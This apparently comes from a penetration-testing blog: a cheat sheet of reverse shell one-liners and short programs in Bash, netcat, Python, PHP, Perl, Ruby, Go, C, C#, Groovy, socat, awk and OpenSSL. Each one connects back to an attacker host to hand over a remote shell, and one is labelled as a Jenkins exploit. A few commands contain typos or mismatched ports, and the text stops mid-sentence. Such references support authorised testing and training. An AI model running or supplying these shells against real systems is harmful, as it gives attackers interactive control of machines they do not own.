Reverse Shell Cheat Sheet

3 minute read

Cheat sheet for common reverse shells, mainly one liners.

TCP

Bash


bash -i >& /dev/tcp/AttackerIP/port 0>&1
/bin/bash -i >& /dev/tcp/AttackerIP/port 0>&1

exec 5<>/dev/tcp/AttackerIP/port;cat <&5 | while read line; do $line 2>&5 >&5; done

exec /bin/sh 0</dev/tcp/AttackerIP/port 1>&0 2>&0

0<&196;exec 196<>/dev/tcp/AttackerIP/port; sh <&196 >&196 2>&196


Netcat


nc -e /bin/sh AttackerIP port   // Linux
nc -e cmd.exe AttackerIP port  // Windows

mknod p pipe; /bin/bash 0<pipe | nc AttackerIP port
mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc AttackerIP port 1>/tmp/backpipe
mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc AttackerIP port -e /bin/bash 1>/tmp/backpipe     
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc AttackerIP port >/tmp/f


Telnet


rm -f /tmp/p; mknod /tmp/p p && telnet AttackerIP port 0/tmp/p

telnet AttackerIP port1 | /bin/bash | telnet AttackerIP port2


Python


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("AttackerIP",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


PHP


<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/AttackerIP/port 0>&1'");?>
<?php shell_exec('bash -i >& /dev/tcp/AttackerIP/port 0>&1');?>

<?php -r '$sock=fsockopen("AttackerIP",port);exec("/bin/sh -i <&3 >&3 2>&3");'?>
<?php -r '$s=fsockopen("AttackerIP",port);shell_exec("/bin/sh -i <&3 >&3 2>&3");'?>
<?php -r '$s=fsockopen("AttackerIP",port);`/bin/sh -i <&3 >&3 2>&3`;'?>
<?php -r '$s=fsockopen("AttackerIP",port);system("/bin/sh -i <&3 >&3 2>&3");'?>
<?php -r '$s=fsockopen("AttackerIP",port);popen("/bin/sh -i <&3 >&3 2>&3", "r");'?>


Perl


perl -e 'use Socket;$i="AttackerIP";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"AtackerIP:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

// Windows:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"AttackerIP:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


Ruby


ruby -rsocket -e'f=TCPSocket.open("AttackerIP",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Go


package main

import (
  "os/exec"
  "net"
)

func main() {
  c,_ := net.Dial("tcp", "IP:port")
  cmd := exec.Command("/bin/sh")
  cmd.Stdin = c
  cmd.Stdout = c 
  cmd.Stder = c
  cmd.Run()
}


C


#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

#define REMOTE_ADDR "10.13.14.15"
#define REMOTE_PORT 443

int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int s;

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
    sa.sin_port = htons(REMOTE_PORT);

    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);

    execve("/bin/sh", 0, 0);
    return 0;
}


C#


using System;
using System.Net.Sockets;
using System.IO;
using System.Diagnostics;
using System.Text;
using System.Linq;

namespace reverse_shell
{
    class Reverse
    {
        public static void Main (string[] args)
        {
            using (TcpClient client = new TcpClient (args [0], int.Parse (args[1]))) {
                using (Stream stream = client.GetStream()) {
                    using (StreamReader rdr = new StreamReader(stream)) {
                        while (true) {
                            string cmd = rdr.ReadLine();
                            if (string.IsNullOrEmpty(cmd)) {
                                rdr.Close();
                                stream.Close();
                                client.Close();
                                return;
                            }
                            if (string.IsNullOrWhiteSpace(cmd)) {
                                continue;
                            }
                            string[] split = cmd.Trim().Split(' ');
                            string filename = split.First();
                            string arg = string.Join(" ", split.Skip(1));
                            try {
                                Process prc = new Process();
                                prc.StartInfo = new ProcessStartInfo();
                                prc.StartInfo.FileName = filename;
                                prc.StartInfo.Arguments = arg;
                                prc.StartInfo.UseShellExecute = false;
                                prc.StartInfo.RedirectStandardOutput = true;
                                prc.Start();
                                prc.StandardOutput.BaseStream.CopyTo(stream);
                                prc.WaitForExit();
                            } catch {
                                string error = "Error running command: " + cmd + "\n";
                                byte[] errorBytes = Encoding.ASCII.GetBytes(error);
                                stream.Write(errorBytes, 0, errorBytes.Length);
                            }
                        }
                    }
                }
            }
        }
    }
}


Java


r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/AttackerIP/port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


Goovy Java


// Used to exploit Jenkins server
String host="AttackerIP";
int port=port;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();


Socat


// Start socat listener
socat file:`tty`,raw,echo=0 tcp-listen:port

socat tcp-connect:AttackerIP:port exec:bash,pty,stderr,setsid,sigint,sane
socat tcp-connect:AttackerIP:port exec:"bash -li",pty,stderr,setsid,sigint,sane


More socat


socat -d -d TCP4-LISTEN:443 STDOUT

scoat TCP4:<ip>:443 EXEC:/bin/bash


Encrypted socat bind shell


openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind.crt

cat bind.key bind.crt > bind.pem

sudo socat OPENSSL-LISTEN:443,cert=bind.pem,verify=0,fork EXEC:/bin/bash  // setup listener

socat - OPENSSL:<ip>:443,verify=0

Xterm


xterm -display AttackerIP:1    // execute on compromised host - will try to connect back to AttackerIP on port 6001

Xnest :1                      // catch the shell

xhost +TargetIP              // authorise the targets connection to your attack box


Awk

awk 'BEGIN {s = "/inet/tcp/0/AttackerIP/port"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null


OpenSSL


First we’ll need to generate keys on kali:

root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes


Then you’ll want to use a terminal multiplexer like tmux with a vertical split for a comfortable experience:

1. sudo openssl s_server -quiet -key key.pem -cert cert.pem -port 73    // stdin
2. sudo openssl s_server -quiet -key key.pem -cert cert.pem -port 136   // stdout
//RCE command on vulnerable windows box
C:\path\to\openssl.exe s_client -quiet -connect AttackerIP:76 | cmd.exe 2>&1 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect AttackerIP:136


The RCE command will connect to our listening openssl server on port 73 and pipe cmd.exe to our other openssl server on port 136. The end result will look like this: